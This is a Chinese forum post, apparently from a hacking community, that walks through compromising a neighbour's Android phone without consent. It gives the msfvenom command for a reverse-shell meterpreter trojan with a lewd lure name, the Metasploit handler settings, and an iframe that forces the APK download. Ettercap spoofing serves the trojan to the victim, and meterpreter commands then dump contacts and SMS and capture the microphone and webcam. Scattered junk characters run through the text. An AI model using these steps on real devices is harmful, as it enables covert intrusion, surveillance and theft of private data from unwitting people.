找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1824|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 W( o* g8 J2 |5 h 五、msf+ettercap入侵邻居安卓手机 & ]( Q1 z8 q$ @5 D9 {2 V

8 j" B& Z" R& q0 t0 s7 N0 ^

0 d! x/ ~* `( y( m# p0 K8 W 首先启动msf . O/ I- m8 [( o% K: A2 U0 T

" R/ s0 ^& b( `2 z! M' P

; m7 z3 v1 E* H- y 先用kali生成一个安卓木马,如下命令: : a9 q4 p1 |0 q7 T1 o8 @2 T& ]# m

3 Y% f; u$ T/ X2 |1 Q

' ^) g9 G9 c, a' S Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk + y7 W7 o# E7 S( {

! U- L; u9 s2 |

/ j$ |% ~0 f) O2 ? 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 & ~& Z2 u' e4 j

. o9 l: U) ?! W5 z- Q

# g* }# Y/ U, \& G$ } 然后进入msf / Z$ Y1 A2 q+ q- E2 |

- d0 c5 S2 d9 H: T' u) H) G, \

' _% H& C& }1 B$ r# G) ` use exploit/multi/handler 8 y; I7 e& a. h. @& w/ g6 F5 O8 Z, W

* i! @7 Q* m$ i/ u* m4 R/ u

+ I3 x$ K* l7 r5 Z8 `4 V set payload android/meterpreter/reverse_tcp - b/ z6 ] L; g7 x; V' _; z5 |

% J0 q% l$ X% F5 O _: W( p) J) G

* ^8 A0 ?2 g* y" p8 M$ ?- V; T7 s( E set LHOST 192.168.0.109 //ipkailiip 6 ^: f5 K D3 E2 C1 f Z

* W1 U/ V% n) Q$ ]8 A6 R) Y& u

* ^5 w& n& x( m4 M set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + g0 U! G2 E' t z

4 c4 C0 z8 {0 y' `

7 L( b7 _& I) U9 f Exploit - B% r8 P2 Z, t

% E! ^/ b4 F: T/ _! j2 B" h$ f7 `

. h0 ~) h( t, \" ?) b1 U5 j   # f% x4 N3 j( m# I* R$ r3 g

7 H9 D1 G" f- c3 j& I, e

/ {/ J' X0 H3 n- S7 z4 T 下面我们开启ettercap -G # ~* S3 F, O3 e. p( E4 w

) f4 r) _- w1 [

: s4 i9 H7 D. o& x 我物理IP d7 e; d! @3 M/ N& ]

, e! B9 X* B% {/ W/ Y t, p

4 F/ T% E5 D* n: C2 H   ( Q4 H- O: m- k% a1 X! B' U

9 f. _1 A# @: U+ o5 _

1 Q' ]1 x/ Y! ?- t4 ]/ u3 W 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 6 \- O. X' L/ V6 ^$ ]

. u+ O& g) w4 A/ Z7 c

B7 M8 c5 Y( _ 下面我们来设置一下 ; K+ E9 S4 G4 F' I" y! Q

) _& C5 V7 O3 \. V- t \3 @4 L2 q! i

- w) i) s9 g8 P9 e' X( a* _, a   " F3 U" V1 O8 F8 ]; X

, Y, o8 U* |- j/ U" W p5 ~# [

+ D* l0 Y! V% ]' b" D 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 I/ x( @& A" x: h4 a8 Y" t. t

" W* g# p8 B8 B4 m& a) k" \: d0 V

! u- H! U0 z! |7 R: N+ }0 r' P, x   ' w# ^7 j5 ]- A8 |

. Z" `- O# p. x$ H4 b/ U# _7 m3 X

" a* h# [ G$ m# F. m   / w& g, Y; X+ c

' r6 J- f; W R

+ z, P7 ~9 c; A1 r9 `9 C' {" X$ d   , ?" v/ J) R7 @$ }& E4 E

1 s/ w# I9 C8 y8 s( W% e

2 Y2 x3 K7 |$ C5 y   5 I3 J6 U- d* X4 j+ T" M8 @& G

+ C8 ^7 }2 d# v* |

' a* Y5 D8 `' ]7 n' p8 v   4 q9 A2 }' d( F

% B U1 k$ x$ ~2 u3 f& L% K; m

2 t, |/ u5 p2 g! W$ O4 |   ; `8 G! A8 |5 \* [0 B; k

: {- `& o+ \1 t7 X( L l+ B

1 ~( G% g" W! V8 R% H3 y   - Q/ g. |0 U6 h( F7 G& O

* Z4 r, J3 }2 o* s* Q

1 k* T$ t3 ]" j9 M) {- G9 w   d3 R Q8 \) d5 A7 ?2 q

# s' W0 |9 u6 G7 A% B

; C% i" R1 x# w   ( [, p1 ^9 Q% g# q7 g

1 @9 {0 {# x# I4 M; O

% E, p4 t7 O( P! H! I   % k: h4 g6 s* s- Y. M' \

) n: l4 X7 X7 |+ X3 ~

# H+ ?5 J8 Z( v* i- N& M   ) K* Y' }: f( ] ]$ c$ [- x# r

3 \, p+ z' x' E

& a4 ?! |( T8 O) x4 w* E1 n   # P6 m* \ W2 E, `3 h' o5 s

1 m6 a8 u$ z( @6 n y

7 m5 k9 U: e; t" O+ M, K   / F$ q: Z" c8 c d

M c* i& E& a7 \5 m* C4 `2 `

4 M/ k6 }( L- b% i- q3 C 下面我们开始攻击 + Q% I: g! U1 S

) c( F0 S6 b3 ?* {

! z5 H$ ? ~; a7 l6 \   7 t% a- E. w1 C& F; n1 M+ ^

$ `) h( a0 F2 k5 t/ m4 U& M

# u! H, B* d( {; A1 n# q7 y1 j: h+ P   / L* _! w0 c% F/ d# i }

$ d- V9 H4 p/ R- \( a

0 G; K) Z* D. R7 X   ' D6 [1 b% [: z; w6 O

# S3 k5 J2 N3 ?% V( K2 q

+ e+ X* s5 M8 O8 x: `   ) [4 C' E; n J! Y

* c. |8 k) r' L

! b- X1 G& @& y2 y! ~6 b1 Q   5 E5 N! z! `+ w9 \( M

, I6 u- z P1 U- B* e# J P5 W; }

6 j0 D m: b' c! j( g& n$ C, L 大概过了5分钟多,发现反弹成功了 ; A! }3 z) y' O9 w

% e B9 a. f% T7 h

- Y+ G( Q+ C% x   w7 e8 r$ }. {+ Y+ h

+ R9 z% A c/ v7 N( C$ [/ s% p

/ _, z9 c/ N y6 J# Q   8 B8 Z5 p* P9 [: a

% q$ O, I: d- u8 t& ~

# ~6 w; ~: a% M7 R   ) I7 @5 \1 g! }' R* A! S6 p/ m

! j3 n' H6 ?, C3 O: X, ^1 A

3 c( r, q W+ K' c$ t' o   4 \ [& q2 ~/ ^% D0 t: V6 t) o

" O. ` i9 j% d. E

I: | W+ f) C8 M% E8 \   , I9 E' D, E9 E( a( S' Q3 J: `: ?3 K

5 @$ F! U; Y0 ^1 g6 H8 g

+ F2 s" V4 B( B8 N) Q- a/ r& i   } P5 K+ @2 h5 K- ^( G) u

3 _ Z: Q( q; \; B. G

$ x3 r$ w* {5 ]( t! A   ! [; h! m; u4 n2 \6 Z

% f5 F+ n; S% P, `

* K+ \" u5 X2 Y" B! X; q 执行命令 % S) u; S2 G$ e. ~' o$ V4 e6 D

: P$ s& x. ~; s, W! a

/ J9 H, T7 T8 T$ v* l( f* j   1 l$ O, s$ d% H4 G/ Q

9 Y* i1 U5 R/ T* O* }

# A2 _& Q# {5 B# e dump_contacts    --》这个是导出电话 ( T4 D9 ^, I( ]

' `( n9 Z2 N) @% Z

7 H. g! w. w, B4 s& K dump_sms --》这个是导出信息 ; i6 S6 S& f+ X

. @) J$ Z+ Y0 |0 S

' q) U& z1 q* F4 n5 O/ k5 G& c record_mic     Record audio from the default microphone for X seconds 9 Q/ l3 U! L+ x* T+ P% `

% W( u% \ x$ U+ y& A8 f

y2 u. m( U }% S: @     webcam_chat    Start a video chat / e0 J2 W! C6 ?* D4 I% Q9 t

2 Y! I+ P* K4 h! K2 a: l0 k7 I

& w2 `$ R0 z# b1 w1 M0 L( Z, s     webcam_list    List webcams 0 _' z! u/ u& t0 E3 Q* y

, Z- u# }0 v4 R

8 i( I, j" z/ W     webcam_snap    Take a snapshot from the specified webcam & J# Q5 D; z" Q( [# N ?

4 `7 W3 s. r9 I

1 b8 I9 [4 n3 f1 n& x. h webcam_stream  lay a video stream from the specified webcam # q% F! \. C/ L) L/ d) o" q5 u

# k8 V# T3 R, L2 _/ P( v7 V

6 E- ^+ M, v o# R& O* d   + ]* m7 u& A) f, t

4 b+ ~& g. o P

3 i# K) T" x L3 @: e- s   - L/ P$ e7 {7 Q+ |3 B$ i% t

3 ~9 `/ x3 X8 s D6 W

/ b4 z! ], p! I0 h' c E/ c: e/ \ 我们打开看一下电话薄, % W! W) f9 n( M+ {4 X' c

2 d3 ?( P Q& n' J0 r) r3 r. G' \& Q6 ?

" A) ~0 | h/ V1 h* v0 y   " f. n( C j% Q" [# }

- R& S% g( M" L8 `8 S+ u1 e, x

3 h/ c' |6 v# H0 p A# Y9 y   + [, m4 x/ I8 Q

, }( J* Y, H$ q& o

' p, ^- j( b% |2 F   ) U C3 Q7 {5 r1 x5 j# @0 F, C

3 w$ @8 ?0 C- [+ a3 z2 p. S$ P, U

! v9 y$ A) J! s' Y6 f   3 U K+ j" t& ~+ `8 G" ~$ q

1 |; H {, c; ~0 O9 A# h% x3 ?

7 d* j7 }: J* e3 u# c   : d! ]: ~1 p% V, A$ [2 Y

0 z+ ?, q% {9 c5 h

8 x) \3 U) o3 N* c   & K4 h: W, {' z4 O; D4 _

; |1 N4 a) l9 ?7 a9 e- _

0 ?4 j* _ C E* i. Q& c# y2 w 我们同时欺骗成DroidJack木马,使用方法如图: / W1 K. `: \+ Y

! J6 S7 ~6 k6 `! y

) O6 R- U; F/ h( Z4 U) W) ~   7 q' ?7 E0 F: u6 i

* G( ^ ^3 B: \* F* X

% y% L' d8 M/ u5 H" ^) F5 Q   ; K5 w7 V( T' {8 m

9 ^; P$ o+ O' Q1 U! V9 q2 }$ x

+ B( ~8 `: Q7 m8 w" a: x4 L4 Z' A   1 G; Q4 I; q: |9 w! p% c& {

; }! I$ } R+ i

/ |" v! J% M: f* q7 x- a6 K( [ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ; y7 i3 R4 `. q9 P9 _. S8 R N

0 G4 {0 F. y( Z( F! }; q! P- E

v% n# T$ R1 e$ v$ R$ O+ j   , c2 G1 }! P4 g" q( e0 H5 k. x

0 \; p7 b9 s7 u* q, I9 U" ~$ e' R

% @6 \5 w. w7 Y) S2 Z   , l/ E0 p: O: _: S4 Q. B

* |9 u7 y9 B+ J! D0 }, i

7 s, f" f) T9 p   5 d$ n5 E; m; G( s8 `

: h- j+ S+ h4 s) r! K

- [& D D8 x% B* m4 v( K+ n$ m ) i/ Y2 B3 D. o% _. v- O

1 K+ u5 @' s5 m" S

8 q6 C4 J% j2 o& r& a
. G. k# A- p0 k: T8 A. m5 F2 Z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表